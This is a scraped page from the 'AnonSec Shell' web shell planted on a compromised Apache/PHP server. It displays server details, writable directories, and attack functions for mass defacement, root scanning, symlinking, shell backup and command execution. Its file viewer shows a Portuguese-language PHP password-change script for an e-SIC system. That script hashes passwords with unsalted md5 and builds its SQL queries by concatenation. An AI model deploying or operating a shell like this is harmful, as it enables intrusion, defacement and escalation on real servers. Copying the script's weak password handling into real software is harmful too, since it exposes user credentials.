AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/esic/cmhorizonte/restrito/alterasenha/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/esic/cmhorizonte/restrito/alterasenha/manutencao.php
<?php


    include_once("../inc/autenticar.php");
    include_once("../class/solicitante.class.php");


    $erro = "";    //grava o erro, se houver, e exibe por meio de alert (javascript) atraves da funcao getErro() chamada no arquivo do formulario. ps: a fun��o � declara em inc/security.php


    //se tiver sido postado informação do formulario
    if ($_POST['acao']) {

        $idusuario     = getSession("uid");
        $senhaatual    = $_POST["senhaatual"];
        $novasenha     = $_POST["novasenha"];
        $confirmasenha = $_POST["confirmasenha"];


        $sql = "select chave from sis_usuario where idusuario = $idusuario";
        $rs  = execQuery($sql);

        if (mysql_num_rows($rs)==0) {
            $erro = "está não encontrado";
            return false;
        } else {
            $row   = mysql_fetch_array($rs);
            $chave = $row['chave'];

            if (md5($senhaatual)!=$chave) {
                $erro = "Senha atual est� incorreta.";
                return false;
            }

            if ($novasenha<>$confirmasenha) {
                $erro = "Nova senha não confere com a Confirmação";
                return false;
            }
        }

        $sql
            = "UPDATE sis_usuario SET
                         chave = '" . md5($novasenha) . "'
			WHERE idusuario = $idusuario";

        if (!execQuery($sql)) {
            $erro = "Erro ao alterar senha do solicitante";
        } else {
            Redirect("../index");
        }
    }


?>

Anon7 - 2022
AnonSec Team